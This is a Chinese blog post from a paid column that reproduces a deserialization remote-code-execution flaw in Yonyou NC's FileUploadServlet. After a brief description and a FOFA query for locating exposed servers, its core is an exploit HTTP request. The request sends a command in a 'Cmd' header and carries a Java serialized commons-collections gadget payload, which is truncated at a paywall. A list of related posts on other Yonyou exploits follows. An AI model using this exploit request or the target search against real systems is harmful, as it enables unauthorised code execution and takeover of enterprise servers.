用友NC FileUploadServlet 反序列化RCE漏洞复现

最新推荐文章于 2024-05-05 12:38:09 发布
最新推荐文章于 2024-05-05 12:38:09 发布
阅读量1.4k 收藏 10
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134793482
版权

0x01 产品简介

 用友 NC 是用友网络科技股份有限公司开发的一款大型企业数字化平台。

0x02 漏洞概述

  用友 NC nc.file.pub.imple.FileUploadServlet 反序列化漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="用友-UFIDA-NC"

0x04 漏洞复现

Exp 

POST /servlet/~baseapp/nc.file.pub.imple.FileUploadServlet HTTP/1.1
Host: your-ip
Cmd: whoami
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 20434

{
  {unquote("\xac\xed\x00\x05sr\x00\x11java.util.HashSet\xbaD\x85\x95\x96\xb8\xb74\x03\x00\x00xpw\x0c\x00\x00\x00\x01?@\x00\x00\x00\x00\x00\x01sr\x004org.apache.commons.collections.keyvalue.TiedMapEntry\x8a\xad\xd2\x9b9\xc1\x1f\xdb\x02\x0
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 12
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
用友NC JiuQiClientReqDispatch序列RCE漏洞
0xSec
12-05 1050
用友 NC JiuQiClientReqDispatch 接口存在序列代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友 NC uploadControl/uploadFile 文件上传致RCE漏洞
0xSec
06-11 656
用友 NC uploadControl/uploadFile 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
用友 NC actionhandlerservlet 序列漏洞
qq_39573664的博客
01-03 2470
用友 NC actionhandlerservlet处存在序列漏洞,攻击者通过漏洞可以获取网站权限,导致服务器失陷。
用友filereceiveservlet-fileupload-CNVD-2023-85593
qq_36334672的博客
01-25 404
用友NC6.5。
用友GRP-U8 内控管理软件/servlet/FileUpload 任意文件上传漏洞
0xSec
12-23 1148
用友GRP-U8内控管理软件存在任意文件(/servlet/FileUpload)上传漏洞,攻击者可通过该漏洞上传木马,远程控制服务器。
用友NC任意文件上传漏洞
热门推荐
Adminxe的博客
12-14 1万+
0x00 事件描述 用友NC是一款企业级管理软件,在大中型企业广泛使用。实建模、开发、继承、运行、管理一体的IT解决方案信息平台。用友NC 为C/S 架构,使用JAVA编程语言开发,客户端可直接使用UClient,服务端接口为HTTP。 用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统上传任意文件执行命令。 0x01 漏洞原理 根据文档,FileRece..
用友NCNC Cloud MxServlet序列漏洞
0xSec
11-15 2190
用友NCNC Cloud系统存在序列漏洞,系统未将用户传入的序列数据进行过滤就直接执行了序列操作,结合系统本身存在的序列利用链,可造成了命令执行,深入利用可随意操作服务器。
JAVA文件上传 ServletFileUpLoad 实例
x_san3的博客
09-10 1696
1.  jsp <%@ page language="java" contentType="text/html" pageEncoding="utf-8"%> <!DOCTYPE html> <html> <head> <title>文件上传</title> </h
EtMi832#PeiQi-WIKI-POC#用友 NC XbrlPersistenceServlet序列2
07-25
用友 NC XbrlPersistenceServlet序列漏洞描述用友 NC XbrlPersistenceServlet序列漏洞漏洞影响用友NC漏洞
fastjson1.2.24序列RCE
最新发布
06-24
然而,像许多处理序列序列的库一样,Fastjson在某些版本中存在安全风险,其中之一便是“Fastjson 1.2.24序列RCE漏洞。这个漏洞允许攻击者通过精心构造的JSON输入,在目标系统上执行任意代码,从而可能...
bfengj#CTF#thinkphp5.0.24序列rce1
07-25
thinkphp5.0.24序列rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
Nacos JRaft Hessian 序列 RCE 分析.pdf
04-22
### Nacos JRaft Hessian 序列 RCE 分析 #### 一、背景介绍 Nacos 是阿里巴巴开源的一款易于构建云原生应用的动态服务发、配置管理和服务管理平台。JRafT 是 SOFAStack 微服务平台中的一个分布式一致性组件...
使用FileUpload实Servlet的文件上传
weixin_30633405的博客
04-26 453
简介 FileUpload 是 Apache commons下面的一个子项目,用来实Java环境下的文件上传功能。 FileUpload链接 FileUpload 是基于Apache的Commons IO的,所以在使用之前需要先在BuildPath种添加Commons IO。 Commons IO链接 1.在项目种添加Commons IO和FileUpload 1.1下载Comm...
用友 NC bsh.servlet.BshServlet RCE利用
huangyongkang666的博客
01-09 5557
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
漏洞用友NC-任意文件上传-uploadFile
知黑而守白
05-05 198
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件上传。该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
用友NC_FileReceiveServlet_命令执行(含批量验证poc)
weixin_43567873的博客
04-17 115
用友NC_FileReceiveServlet_命令执行(含批量验证poc)
用友U8 Cloud 序列RCE漏洞
0xSec
11-08 4076
用友U8Cloud存在多处(FileManageServlet和LoginVideoServlet)序列漏洞,系统未将用户传入的序列数据进行过滤就直接执行序列操作,结合系统本身存在的序列利用链,最终造成远程代码执行。
用友NC uapjs RCE漏洞(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
用友u8 cloud 序列rce漏洞
12-05
用友U8 Cloud是一款企业级管理软件,但是近期被发存在序列远程命令执行(RCE漏洞。要这个漏洞,首先需要一个能够触发序列的点,比如一个可控制的对象。接下来,我们可以构造一个恶意的序列数据,然后将这个数据传递给U8 Cloud系统,让系统进行序列操作。当系统对这个数据进行序列时,就会触发我们植入的恶意代码,从而实远程命令执行。 为了更具体地说明这个过程,我们可以借助一个简单的例子来解释。假设我们构造了一个包含恶意命令的序列数据,并将其发给U8 Cloud系统。系统在接收到这个数据后,会将其解析,然后执行其中的命令。这样一来,我们就成功地利用了序列漏洞来实远程命令执行。 当然,为了成功这个漏洞,还需要一些具体的技术细节和环境配置。需要了解U8 Cloud系统的结构和漏洞的具体利用方式,还可能需要使用特定的工具来构造恶意的序列数据。在过程中,一定要格外小心,确保不会对受影响的系统造成损害。同时,及时向厂商馈该漏洞,以便及时修和加强系统安全防护。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值